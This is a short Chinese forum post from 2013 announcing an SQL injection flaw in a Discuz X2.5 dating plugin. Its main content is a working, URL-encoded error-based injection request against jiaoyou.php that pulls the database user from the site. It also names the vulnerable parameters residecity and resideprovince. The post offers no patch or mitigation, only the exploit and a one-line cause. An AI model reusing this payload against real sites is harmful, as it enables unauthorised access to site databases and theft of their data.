Discuz教程网

1314学习网»站长论坛 discuz资源中心 discuz教程 Discuz X2.5交友插件注入漏洞
返回列表 发新帖

[其他教程] Discuz X2.5交友插件注入漏洞

[复制链接]
authicon 小白 发表于 2013-5-28 18:06:37 | 显示全部楼层 |阅读模式
0711390392599806a4ef1528c012583ea75878d5.gif

  1. GET

  3. http://www.yoursite.com/jiaoyou.php?mod=search&residecity=%27%20or%20@%60%27%60%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28user%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20or%20@%60%27%60%20and%20%271%27=%271

  5. residecity

  7. resideprovince
复制代码


参数过滤不严
交友



上一篇:【zhuti】山水如画电脑主题
下一篇:转载:西班牙的民俗风情

相关帖子
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1314学习网 ( 浙ICP备10214163号 )

GMT+8, 2024-4-29 17:19

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表